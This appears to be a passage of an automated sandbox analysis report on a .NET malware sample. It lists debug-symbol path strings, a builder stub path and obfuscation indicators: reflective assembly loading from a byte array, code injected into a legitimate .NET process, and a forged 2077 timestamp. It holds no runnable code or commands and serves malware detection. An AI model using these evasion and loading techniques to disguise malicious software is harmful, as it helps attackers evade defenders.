                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdbK source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: lC:\Users\user\Desktop\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb:8 source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb; source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: D .pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbMZ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: tuneraidfix.pdb<qA source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: fixedhost.pdb source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Core.pdbq source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb] source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Zsymbols\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: l8C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbi source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: W7UbgU8x18.exe, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.1.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.5.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs.Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272B7B2 push ds; retf 0_2_0272B7B6
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272545A push ds; retf 0_2_0272545E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064635A8 push es; iretd 2_2_06463D3C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464245 push es; iretd 2_2_06464248
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464241 push es; iretd 2_2_06464244
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646424D push es; iretd 2_2_06464250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464249 push es; iretd 2_2_0646424C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464255 push es; iretd 2_2_06464258
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464251 push es; iretd 2_2_06464254
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646425D push es; iretd 2_2_06464260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464259 push es; iretd 2_2_0646425C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464265 push es; iretd 2_2_06464268
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464261 push es; iretd 2_2_06464264
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646426D push es; iretd 2_2_06464270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464269 push es; iretd 2_2_0646426C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464275 push es; iretd 2_2_06464278
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464271 push es; iretd 2_2_06464274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646427D push es; iretd 2_2_06464280
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464279 push es; iretd 2_2_0646427C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464205 push es; iretd 2_2_06464208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464201 push es; iretd 2_2_06464204
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646420D push es; iretd 2_2_06464210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464209 push es; iretd 2_2_0646420C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464215 push es; iretd 2_2_06464218
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464211 push es; iretd 2_2_06464214
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646421D push es; iretd 2_2_06464220
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464219 push es; iretd 2_2_0646421C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464225 push es; iretd 2_2_06464228
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464221 push es; iretd 2_2_06464224
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646422D push es; iretd 2_2_06464230
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464229 push es; iretd 2_2_0646422C
                      Source: W7UbgU8x18.exeStatic PE information: 0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC]
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
